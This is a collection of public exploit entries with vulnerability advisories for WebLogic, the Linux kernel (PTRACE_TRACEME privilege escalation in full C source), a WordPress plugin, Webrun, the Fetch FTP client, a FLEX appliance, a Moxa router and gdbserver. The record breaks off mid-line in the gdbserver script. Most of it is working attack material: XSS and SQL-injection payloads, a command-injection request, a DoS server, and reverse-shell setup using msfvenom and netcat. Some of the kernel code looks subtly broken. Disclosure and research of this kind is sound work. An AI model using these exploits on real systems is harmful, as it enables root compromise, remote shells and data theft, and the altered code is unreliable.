<pre><code># Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion<br /># Date: 25/1/2022<br /># Exploit Author: Jonah Tan (@picar0jsu)<br /># Vendor Homepage: https://www.oracle.com<br /># Software Link:<br />https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html<br /># Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0<br /># Tested on: Windows Server 2019<br /># CVE : CVE-2022-21371<br /><br /># Description<br />Vulnerability in the Oracle WebLogic Server product of Oracle Fusion<br />Middleware (component: Web Container).<br />Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0<br />and 14.1.1.0.0.<br />This easily exploitable vulnerability allows an unauthenticated attacker with<br />network access via HTTP to compromise Oracle WebLogic Server.<br />Successful exploitation of this vulnerability can result in unauthorized access<br />to critical data or complete access to all Oracle WebLogic Server<br />accessible data.<br /><br /># PoC<br />GET .//META-INF/MANIFEST.MF<br />GET .//WEB-INF/web.xml<br />GET .//WEB-INF/portlet.xml<br />GET .//WEB-INF/weblogic.xml<br /><br /></code></pre>
<pre><code># Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)<br /># Date: 11/22/21<br /># Exploit Author: Ujas Dhami<br /># Version: 4.19 - 5.2.1<br /># Platform: Linux<br /># Tested on:<br /># ~ Ubuntu 19.04 kernel 5.0.0-15-generic<br /># ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64<br /># ~ Kali Linux kernel 4.19.0-kali5-amd64<br /># CVE: CVE-2019-13272<br /><br />// ....<br />// Original discovery and exploit author: Jann Horn<br />// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903<br />// Modified exploit code of: BColes<br />// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272<br />// ....<br />// ~ Uses the PolKit_Exec frontend.<br />// ~ PolKit_Action is branched.<br />// ~ Search is optimized.<br />// ~ Trunks attain search priority upon execution.<br />// ....<br />// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme<br />// ujas@kali:~$ ./exploit_traceme<br />// Welcome to your Arsenal!<br />// accessing variables...<br />// execution has reached EOP.<br />// familiar trunks are been searched ...<br />// trunk helper found: /usr/sbin/mate-power-backlight-helper<br />// helper initiated: /usr/sbin/mate-power-backlight-helper<br />// SUID process is being initiated (/usr/bin/pkexec) ...<br />// midpid is being traced...<br />// midpid attached.<br />// root@kali:/home/ujas#<br />// ....<br /><br />#include <ctype.h><br />#include <assert.h><br />#include <conio.h><br />#include <stdio.h><br />#include <sys/syscall.h><br />#include <sys/stat.h><br />#include <fcntl.h><br />#include <sched.h><br />#include <stddef.h><br />#include <sys/user.h><br />#include <linux/elf.h><br />#include <stdarg.h><br />#include <pwd.h><br />#include <sys/prctl.h><br />#include <sys/wait.h><br />#include <sys/ptrace.h><br />#include <string.h><br />#include <stdlib.h><br />#include <unistd.h><br />#include <signal.h><br />#define _GNU_SOURCE<br /><br />#define DEBUG<br />#ifdef DEBUG<br 
/>#define dprintf printf<br />#endif<br />#define max(a,b) ((a)>(b) ? (a) : (b))<br />#define eff(expr) ({ \<br /> typeof(expr) __res = (expr); \<br /> if (__res == -1) { \<br /> dprintf("[-] Error: %s\n", #expr); \<br /> return 0; \<br /> } \<br /> __res; \<br />})<br /><br />struct stat st;<br /><br />const char *trunk[1024];<br /><br />const char *trunks_rec[] = {<br /> "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",<br /> "/usr/sbin/mate-power-backlight-helper",<br /> "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",<br /> "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",<br /> "/usr/lib/unity-settings-daemon/usd-backlight-helper",<br /> "/usr/bin/xfpm-power-backlight-helper",<br /> "/usr/bin/lxqt-backlight_backend",<br /> "/usr/lib/gsd-backlight-helper",<br /> "/usr/lib/gsd-wacom-led-helper",<br /> "/usr/lib/gsd-wacom-oled-helper",<br /> "/usr/libexec/gsd-wacom-led-helper",<br /> "/usr/libexec/gsd-wacom-oled-helper",<br /> "/usr/libexec/gsd-backlight-helper",<br /> <br />};<br />static int trace_align[2];<br />static const char *path_exec = "/usr/bin/pkexec";<br />static const char *path_action = "/usr/bin/pkaction";<br />static int fd = -1;<br />static int pipe_stat;<br />static const char *term_sh = "/bin/bash";<br />static int mid_succ = 1;<br />static const char *path_doublealign;<br /><br />static char *tdisp(char *fmt, ...) 
{<br /> static char overlayfs[10000];<br /> va_list ap;<br /> va_start(ap, fmt);<br /> vsprintf(overlayfs, fmt, ap);<br /> va_end(ap);<br /> return overlayfs;<br />}<br /><br />static int middle_main(void *overlayfs) {<br /> prctl(PR_SET_PDEATHSIG, SIGKILL);<br /> pid_t middle = getpid();<br /> fd = eff(open("/proc/_fd/exe", O_RDONLY));<br /> pid_t child = eff(fork());<br /> <br /> if (child == 0) {<br /> prctl(PR_SET_PDEATHSIG, SIGKILL);<br /><br /> eff(dup2(fd, 42));<br /> int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));<br /> char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());<br /> eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));<br /> execl(path_exec, basename(path_exec), NULL);<br /> while (1) {<br /> char overlayfs[1000];<br /> ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));<br /> overlayfs[buflen] = '\0';<br /> if (strstr(overlayfs, threadv)) break;<br /> }<br /><br /> dprintf("SUID execution failed.");<br /> exit(EXIT_FAILURE);<br /> }<br /><br /> eff(dup2(fd, 0));<br /> eff(dup2(trace_align[1], 1));<br /><br /> struct passwd *pw = getpwuid(getuid());<br /> if (pw == NULL) {<br /> dprintf("err: username invalid/failed to fetch username");<br /> exit(EXIT_FAILURE);<br /> }<br /><br /> mid_succ = 1;<br /> execl(path_exec, basename(path_exec), "--user", pw->pw_name,<br /> path_doublealign,<br /> "--help", NULL);<br /> mid_succ = 0;<br /> dprintf("err: pkexec execution failed.");<br /> exit(EXIT_FAILURE);<br />}<br /><br />static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {<br /> struct user_regs_struct regs;<br /> struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };<br /> eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));<br /> eff(waitpid(pid, &pipe_stat, 0));<br /> eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));<br /><br /> unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;<br /> struct injected_page {<br /> unsigned long inj_arse[2];<br /> unsigned long environment[1];<br /> 
char arg0[8];<br /> char path[1];<br /> } ipage = {<br /> .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }<br /> };<br /> strcpy(ipage.arg0, arg0);<br /> for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {<br /> unsigned long pro_d = ((unsigned long *)&ipage)[i];<br /> eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),<br /> (void*)pro_d));<br /> }<br /><br /> eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));<br /> eff(ptrace(PTRACE_DETACH, pid, 0, NULL));<br /> eff(waitpid(pid, &pipe_stat, 0));<br /> <br /> regs.orig_rax = __NR_execveat;<br /> regs.rdi = exec_fd;<br /> regs.rsi = inject_surface + offsetof(struct injected_page, path);<br /> regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);<br /> regs.r10 = inject_surface + offsetof(struct injected_page, environment);<br /> regs.r8 = AT_EMPTY_PATH;<br />}<br /><br />static int stag_2(void) {<br /> pid_t child = eff(waitpid(-1, &pipe_stat, 0));<br /> timeexecbuffer(child, 42, "stage3");<br /> return 0;<br />}<br /><br />static int sh_spawn(void) {<br /> eff(setresgid(0, 0, 0));<br /> eff(setresuid(0, 0, 0));<br /> execlp(term_sh, basename(term_sh), NULL);<br /> dprintf("err: Shell spawn unsuccessful.", term_sh);<br /> exit(EXIT_FAILURE);<br />}<br /><br />static int check_env(void) {<br /> const char* xdg_session = getenv("XDG_SESSION_ID");<br /><br /> dprintf("accessing variables...\n");<br /><br /> if (stat(path_action, &st) != 0) {<br /> dprintf("err: pkaction not found at %s.", path_action);<br /> exit(EXIT_FAILURE);<br /> }<br /> if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {<br /> dprintf("warn: PolKit agent not found.\n");<br /> return 1;<br /> }<br /> if (stat("/usr/sbin/getsebool", &st) == 0) {<br /> if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {<br /> dprintf("warn: [deny_ptrace] is enabled.\n");<br /> return 1;<br /> }<br /> }<br 
/> if (xdg_session == NULL) {<br /> dprintf("warn: $XDG_SESSION_ID is not set.\n");<br /> return 1;<br /> }<br /> if (stat(path_exec, &st) != 0) {<br /> dprintf("err: pkexec not found at %s.", path_exec);<br /> exit(EXIT_FAILURE);<br /> }<br /> <br /> dprintf("execution has reached EOP.\n");<br /><br /> return 0;<br />}<br /><br />int trunkh() {<br /> char cmd[1024];<br /> snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);<br /> FILE *fp;<br /> fp = popen(cmd, "r");<br /> if (fp == NULL) {<br /> dprintf("err: Failed to run %s.\n", cmd);<br /> exit(EXIT_FAILURE);<br /> }<br /><br /> char line[1024];<br /> char buffer[2048];<br /> int helper_index = 0;<br /> int useful_action = 0;<br /> static const char *threadv = "org.freedesktop.policykit.exec.path -> ";<br /> int needle_length = strlen(threadv);<br /><br /> while (fgets(line, sizeof(line)-1, fp) != NULL) {<br /> if (strstr(line, "implicit active:")) {<br /> if (strstr(line, "yes")) {<br /> useful_action = 1;<br /> }<br /> continue;<br /> }<br /><br /> if (useful_action == 0)<br /> continue;<br /> useful_action = 0;<br /><br /> int length = strlen(line);<br /> char* found = memmem(&line[0], length, threadv, needle_length);<br /> if (found == NULL)<br /> continue;<br /><br /> memset(buffer, 0, sizeof(buffer));<br /> for (int i = 0; found[needle_length + i] != '\n'; i++) {<br /> if (i >= sizeof(buffer)-1)<br /> continue;<br /> buffer[i] = found[needle_length + i];<br /> }<br /><br /> if (stat(&buffer[0], &st) != 0)<br /> continue;<br /> <br /> if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||<br /> strstr(&buffer[0], "/cpugovctl") != 0 ||<br /> strstr(&buffer[0], "/package-system-locked") != 0 ||<br /> strstr(&buffer[0], "/cddistupgrader") != 0) {<br /> dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);<br /> continue;<br /> }<br /><br /> trunk[helper_index] = strndup(&buffer[0], strlen(buffer));<br /> helper_index++;<br /><br /> if (helper_index >= 
sizeof(trunk)/sizeof(trunk[0]))<br /> break;<br /> }<br /><br /> pclose(fp);<br /> return 0;<br />}<br /><br />int root_ptraceme() {<br /> dprintf("helper initiated: %s\n", path_doublealign);<br /><br /> eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));<br /> eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));<br /> char overlayfs = 0;<br /> eff(write(trace_align[1], &overlayfs, 1));<br /><br /> dprintf("SUID process is being initiated(%s) ...\n", path_exec);<br /> static char stackv[1024*1024];<br /> pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),<br /> CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));<br /> if (!mid_succ) return 1;<br /> while (1) {<br /> int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);<br /> char overlayfs[16];<br /> int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));<br /> overlayfs[buflen] = '\0';<br /> *strchrnul(overlayfs, '\n') = '\0';<br /> if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)<br /> break;<br /> usleep(100000);<br /> }<br /><br /> dprintf("midpid is being traced...\n");<br /> eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));<br /> eff(waitpid(midpid, &pipe_stat, 0));<br /> dprintf("midpid attached.\n");<br /><br /> timeexecbuffer(midpid, 0, "stage2");<br /> exit(EXIT_SUCCESS);<br />}<br /><br />int main(int argc, char **inj_arse) {<br /> if (strcmp(inj_arse[0], "stage2") == 0)<br /> return stag_2();<br /> if (strcmp(inj_arse[0], "stage3") == 0)<br /> return sh_spawn();<br /><br /> dprintf("Welcome to your Arsenal!\n");<br /><br /> check_env();<br /><br /> if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {<br /> exit(0);<br /> }<br /> <br /> dprintf("efficient trunk is being searched...\n");<br /> trunkh();<br /> for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {<br /> if (trunk[i] == NULL)<br /> break;<br /><br /> if (stat(trunk[i], &st) == 0) {<br /> path_doublealign = trunk[i];<br /> root_ptraceme();<br /> }<br /> }<br /><br /> dprintf("familiar trunks are been searched ...\n");<br /> for (int i=0; 
i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {<br /> if (stat(trunks_rec[i], &st) == 0) {<br /> path_doublealign = trunks_rec[i];<br /> dprintf("trunk helper found: %s\n", path_doublealign);<br /> root_ptraceme();<br /> }<br /> }<br /><br /> return 0;<br />}<br /> <br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Mortgage Calculators WP 1.52 - Stored Cross-Site Scripting (XSS) (Authenticated)<br /># Date: 25-10-2021<br /># Exploit Author: Ceylan Bozogullarindan<br /># Vendor Homepage: https://lenderd.com/<br /># Software Link: https://mortgagecalculatorsplugin.com/<br /># Version: 1.52<br /># Tested on: Linux<br /># CVE : CVE-2021-24904 (https://wpscan.com/vulnerability/7b80f89b-e724-41c5-aa03-21d1eef50f21)<br /><br /><br /># Description:<br />The plugin gives users real-time estimates by providing mortgage calculators. It does not apply any sanitisation to the calculator background colour value set in the admin panel, which could lead to an authenticated Stored Cross-Site Scripting issue. An authenticated attacker can execute malicious JavaScript in the browser of every visitor of a page containing the calculator.<br /><br /><br /># Steps To Reproduce:<br />1. Go to the settings page available under the "Calculator" menu item.<br />2. Click the "Select Color" button and type the following payload into the input field: `hacked</style></head><script>alert(1)</script>`<br />3. Click the "Save Changes" button to save settings.<br />4. Create a new page and add the calculator's shortcode ([mcwp type="cv"]) to it, for testing.<br />5. Visit the page to trigger the XSS.<br /><br /></code></pre>
<pre><code># Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection<br /># Google Dork: intitle:"Webrun 3.6.0.42"<br /># Date: 23/11/2021<br /># Exploit Author: Vinicius Alves<br /># Vendor Homepage: https://softwell.com.br/<br /># Version: 3.6.0.42<br /># Tested on: Kali Linux 2021.3<br /><br />=-=-=-= Description =-=-=-=<br /><br /><br />Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0<br />parameter used to set the username during the login process.<br /><br /><br />=-=-=-= Exploiting =-=-=-=<br /><br /><br />In the post request, change the P_0 value to the following payload:<br />121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd<br /><br /><br />You will see some information like below:<br /><br /><br />interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric:<br />\"qvvxq1qbzbq\"', null, null, null, '<b><br /><br /><br />=-=-=-= POC =-=-=-=<br /><br /><br />If the return has the value 'qvvxq1qbzbq', you will be able to successfully<br />exploit this.<br /><br /><br />See an example of the complete POST parameter:<br /><br /><br />action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python<br />#<br />#<br /># Fetch Softworks Fetch FTP Client 5.8 Remote CPU Consumption (Denial of Service)<br />#<br />#<br /># Vendor: Fetch Softworks<br /># Product web page: https://www.fetchsoftworks.com<br /># Affected version: 5.8.2 (5K1354)<br />#<br /># Summary: Fetch is a reliable, full-featured file transfer client for the<br /># Apple Macintosh whose user interface emphasizes simplicity and ease of use.<br /># Fetch supports FTP and SFTP, the most popular file transfer protocols on<br /># the Internet for compatibility with thousands of Internet service providers,<br /># web hosting companies, publishers, pre-press companies, and more.<br />#<br /># Desc: The application is prone to a DoS after receiving a long server response<br /># (more than 2K bytes) leading to 100% CPU consumption.<br />#<br /># --------------------------------------------------------------------------------<br /># ~/Desktop> ps ucp 3498<br /># USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND<br /># lqwrm 3498 100.0 0.5 60081236 54488 ?? 
R 5:44PM 4:28.97 Fetch-5K1354-266470421<br /># ~/Desktop> <br /># --------------------------------------------------------------------------------<br />#<br /># Tested on: macOS Monterey 12.2<br /># macOS Big Sur 11.6.2<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5696<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5696.php<br />#<br />#<br /># 27.01.2022<br />#<br /><br />import socket<br /><br /># Minimal stand-in FTP server: bind on every interface on the standard FTP<br /># control port (21) and hand out one over-long greeting per connection.<br />host = '0.0.0.0'<br />port = 21<br /><br />s = socket.socket()<br />s.bind((host, port))<br />s.listen(2)<br /><br />print('Ascolto su', host, 'porta', port, '...')<br /><br /># The greeting is "220 " + a hostname, followed by 0x101E (4126) NUL bytes and<br /># CRLF -- roughly 4 KB, well past the ~2K reply length the header above names as<br /># the trigger.  A bound on control-channel reply-line length in the client<br /># would be the natural mitigation.<br />consumptor = '220\x20'<br />consumptor += 'ftp.zeroscience.mk'<br />consumptor += '\x00' * 0x101E<br />consumptor += '\x0D\x0A'<br /><br /># Serve connections until something fails.  The bare except swallows every<br /># exception, including KeyboardInterrupt, so Ctrl-C also ends the loop and the<br /># sockets are never shut down explicitly.<br />while True:<br /> try:<br /> c, a = s.accept()<br /> print('Connessione da', a)<br /> print('CPU 100%, Memory++')<br /> # The oversized banner is the only thing the client needs to receive.<br /> c.send(bytes(consumptor, 'UTF-8'))<br /> # Second line is terminated LF CR (reversed), kept exactly as published.<br /> c.send(b'Thricer OK, p\'taah\x0A\x0D')<br /> # Print up to 17 bytes of whatever the client answers, then wait for the<br /> # next client.  NOTE(review): c is never closed explicitly.<br /> print(c.recv(17))<br /> except:<br /> break<br /></code></pre>
<pre><code># Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection<br /># Date: 2021-11-21<br /># Exploit Author: Mr Empy<br /># Vendor Homepage: https://www.tem.ind.br/<br /># Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94<br /># Version: 1.6.0<br /># Tested on: Android<br /><br /><br />Title:<br />================<br />FLEX 1085 Web - HTML Injection<br /><br />Summary:<br />================<br />The FLEX 1085 Web appliance is vulnerable to an HTML injection attack: the<br />name of a nearby Wi-Fi network is rendered in the dashboard as HTML, which<br />allows the injection of arbitrary HTML code.<br /><br /><br />Severity Level:<br />================<br />5.3 (Medium)<br />CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N<br /><br /><br />Vulnerability Disclosure Schedule:<br />============================<br />* October 19, 2021: An email was sent to support at 6:08 PM.<br /><br />* November 20, 2021: No response was received from support.<br /><br />* November 21, 2021: Vulnerability Disclosure<br /><br /><br />Affected Product:<br />================<br />FLEX 1085 Web v1.6.0<br /><br /><br />Steps to Reproduce:<br />================<br /><br />1. Open your browser and navigate to your device's IP address (http://<IP>).<br /><br />2. Log in to the device's dashboard and go to "WiFi".<br /><br />3. Use another device that has an access point and create a Wi-Fi network<br />called "<h1>HTML Injection</h1>" (no double quotes) and activate the access<br />point. (https://prnt.sc/20e4y88)<br /><br />4. Go back to the FLEX device and scan for Wi-Fi networks: the new network's<br />name is rendered as "HTML Injection" in bold and with a larger font size,<br />showing that the tags were interpreted rather than escaped. (http://prnt.sc/20e51li)<br /><br /></code></pre>
<pre><code>KL-001-2022-002: Moxa TN-5900 Post Authentication Command Injection Vulnerability<br /><br />Title: Moxa TN-5900 Post Authentication Command Injection Vulnerability<br />Advisory ID: KL-001-2022-002<br />Publication Date: 2022.01.28<br />Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2022-002.txt<br /><br /><br />1. Vulnerability Details<br /><br /> Affected Vendor: Moxa<br /> Affected Product: TN-5900<br /> Affected Version: v3.1 and prior<br /> Platform: Moxa Linux<br /> CWE Classification: CWE-78 Improper Neutralization of Special<br /> Elements used in an OS Command<br /> ('OS Command Injection')<br /> CVE ID: CVE-2021-46560<br /><br /><br />2. Vulnerability Description<br /><br /> A user who has authenticated to the management web application<br /> is able to leverage a command injection vulnerability in the<br /> p12 processing code of the certificate management function<br /> web_CERMGMTUpload.<br /><br /><br />3. Technical Description<br /><br /> Following authentication, the webs_CERMGMTUpload API method<br /> becomes accessible. This method takes a multi-part HTTP POST<br /> request containing four parameters. The cer_pw parameter does<br /> not properly neutralize special elements used in operating<br /> system commands and therefore it is possible to include<br /> encapsulated commands to be executed. In the request below,<br /> the cer_pw parameter has been written such that when executed<br /> by the operating system a zero byte file will appear in the<br /> /tmp directory. See the Proof of Concept section.<br /><br /> The relevant pseudo-c for this API method is included below. The<br /> websGetVar function is used to retrieve the cer_pw parameter and<br /> copies the value into the pass variable. The opcode (mgmtmode)<br /> is then compared to the number 2 and when true will prepare a<br /> command to be passed to system using the sprintf function. 
When<br /> preparing this command, the pass variable (cer_pw) is included<br /> without prior first sanitizing the user input.<br /><br /> void web_CERMGMTUpload(longlong *param_1,undefined8 param_2,undefined8 param_3) {<br /> ...<br /> __nptr = websGetVar(param_1,"mgmtmode",&DAT_120064f68);<br /> opcode = atoi(__nptr);<br /> __s = websGetVar(param_1,"cer_file",&DAT_120063dd0);<br /> local_338 = websGetVar(param_1,"cer_name",&DAT_120063dd0);<br /> if ((*local_338 == '\0') || (lVar1 = Ssys_CheckString(local_338), -1 < lVar1)) {<br /> sVar2 = strlen(__s);<br /> if (CONCAT44(extraout_v0_hi,sVar2) < 0x41) {<br /> ...<br /> sVar4 = strlen(local_338);<br /> if (CONCAT44(extraout_v0_hi_00,sVar4) < 0x41) {<br /> ...<br /> if (opcode == 2) {<br /> memset(pass,0,0x41);<br /> __s = websGetVar(param_1,"cer_pw",&DAT_120063dd0);<br /> strncpy(pass,__s,0x20);<br /> ...<br /> }<br /> ...<br /> __fd = open(inFile,0x102);<br /> if (__fd < 0) {<br /> ...<br /> }<br /> else {<br /> sVar3 = write(__fd,param_1[0x38],*(param_1 + 0x39));<br /> ...<br /> else {<br /> if (opcode == 2) {<br /> outFile = FUN_120038e28(&local_159);<br /> snprintf(cmd,0x100,<br /> "openssl pkcs12 -in \"%s\" -out %s -passout pass:%s -password pass:%s",inFile<br /> ,outFile,pass,pass);<br /> system(cmd);<br /> ...<br /> }<br /> ...<br /> }<br /><br /> Using a debugger we can see the command as it was<br /> programmatically created using our malicious input. This<br /> command is passed to the system function.<br /><br /> (gdb) x/25s $a0<br /> 0xfffbddb284: "openssl pkcs12 -in \"/mnt/log1/p12_file/test.p12\" -out /mnt/ramdisk/p12_tmpfile.pem -passout<br />pass:`touch /tmp/korelogic` -password pass:`touch /tmp/korelogic`"<br /> <br /> The file has been created.<br /> <br /> # ls -la /tmp/korelogic<br /> -rwxr-xr-x 1 root root 8072 Sep 23 20:30 korelogic<br /> <br /> It should be noted that the cer_name is exploitable as well.<br /><br /><br />4. 
Mitigation and Remediation Recommendation<br /><br /> The vendor has released a patch that remediates the described<br /> vulnerability. Release notes are available at:<br /><br /> https://www.moxa.com/en/support/product-support/security-advisory/tn-5900-secure-routers-vulnerabilities<br /><br /><br />5. Credit<br /><br /> This vulnerability was discovered by Matt Bergin (@thatguylevel)<br /> and Josh Hardin of KoreLogic, Inc.<br /><br /><br />6. Disclosure Timeline<br /><br /> 2021.02.05 - KoreLogic submits vulnerability details to Moxa.<br /> 2021.02.08 - Moxa acknowledges receipt and the intention to<br /> investigate.<br /> 2021.03.02 - Moxa notifies KoreLogic that a patch for this<br /> vulnerability is expected to be available in June 2021.<br /> 2021.04.16 - 45 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.06.07 - KoreLogic requests an update on the status of the<br /> proposed TN-5900 patch.<br /> 2021.06.15 - Moxa informs KoreLogic that the patch is expected to be released in mid-July 2021.<br /> 2021.06.23 - 90 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.07.25 - Moxa informs KoreLogic that the patch is expected to be released in mid-August 2021.<br /> 2021.09.22 - 150 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.21 - 210 business days have elapsed since KoreLogic reported<br /> this vulnerability to the vendor.<br /> 2021.12.27 - Moxa notifies KoreLogic that the patch is complete and ready for release.<br /> 2021.12.28 - Moxa public acknowledgement.<br /> 2022.01.25 - KoreLogic requests CVE from Mitre.<br /> 2022.01.28 - KoreLogic public disclosure.<br /><br /><br />7. 
Proof of Concept<br /><br /> POST /goform/web_CERMGMTUpload HTTP/1.1<br /> Host: [redacted]:80<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> Accept-Language: en-US,en;q=0.5<br /> Accept-Encoding: gzip, deflate<br /> ...<br /> Connection: keep-alive<br /> Content-Type: multipart/form-data; boundary=---------------------------9051914041544843365972754266<br /> Content-Length: 605<br /> <br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="mgmtmode"<br /> <br /> 2<br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="cer_file";<br /> Content-Type: text/plain<br /> <br /> korelogic<br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="cer_name";<br /> Content-Type: text/plain<br /> <br /> test.p12<br /> -----------------------------9051914041544843365972754266<br /> Content-Disposition: form-data; name="cer_pw";<br /> <br /> `touch /tmp/korelogic`<br /> -----------------------------9051914041544843365972754266--<br /> <br /> HTTP/1.1 200 OK<br /> Server: GoAhead-Webs<br /> Pragma: no-cache<br /> Cache-control: no-cache<br /> Content-Type: text/html<br /><br /><br /><br />The contents of this advisory are copyright(c) 2022<br />KoreLogic, Inc. and are licensed under a Creative Commons<br />Attribution Share-Alike 4.0 (United States) License:<br />http://creativecommons.org/licenses/by-sa/4.0/<br /><br />KoreLogic, Inc. is a founder-owned and operated company with a<br />proven track record of providing security services to entities<br />ranging from Fortune 500 to small and mid-sized companies. We<br />are a highly skilled team of senior security consultants doing<br />by-hand security assessments for the most important networks in<br />the U.S. and around the world. 
We are also developers of various<br />tools and resources aimed at helping the security community.<br />https://www.korelogic.com/about-korelogic.html<br /><br />Our public vulnerability disclosure policy is available at:<br />https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt<br /><br /></code></pre>
<pre><code># Exploit Title: GNU gdbserver 9.2 - Remote Command Execution (RCE)<br /># Date: 2021-11-21<br /># Exploit Author: Roberto Gesteira Miñarro (7Rocky)<br /># Vendor Homepage: https://www.gnu.org/software/gdb/<br /># Software Link: https://www.gnu.org/software/gdb/download/<br /># Version: GNU gdbserver (Ubuntu 9.2-0ubuntu1~20.04) 9.2<br /># Tested on: Ubuntu Linux (gdbserver debugging x64 and x86 binaries)<br /><br />#!/usr/bin/env python3<br /><br /><br />import binascii<br />import socket<br />import struct<br />import sys<br /><br />help = f'''<br />Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode><br /><br />Example:<br />- Victim's gdbserver -> 10.10.10.200:1337<br />- Attacker's listener -> 10.10.10.100:4444<br /><br />1. Generate shellcode with msfvenom:<br />$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin<br /><br />2. Listen with Netcat:<br />$ nc -nlvp 4444<br /><br />3. Run the exploit:<br />$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin<br />'''<br /><br /><br />def checksum(s: str) -> str:<br /> res = sum(map(ord, s)) % 256<br /> return f'{res:2x}'<br /><br /><br />def ack(sock):<br /> sock.send(b'+')<br /><br /><br />def send(sock, s: str) -> str:<br /> sock.send(f'${s}#{checksum(s)}'.encode())<br /> res = sock.recv(1024)<br /> ack(sock)<br /> return res.decode()<br /><br /><br />def exploit(sock, payload: str):<br /> send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')<br /> send(sock, '!')<br /><br /> try:<br /> res = send(sock, 'vCont;s')<br /> data = res.split(';')[2]<br /> arch, pc = data.split(':')<br /> except Exception:<br /> print('[!] ERROR: Unexpected response. 
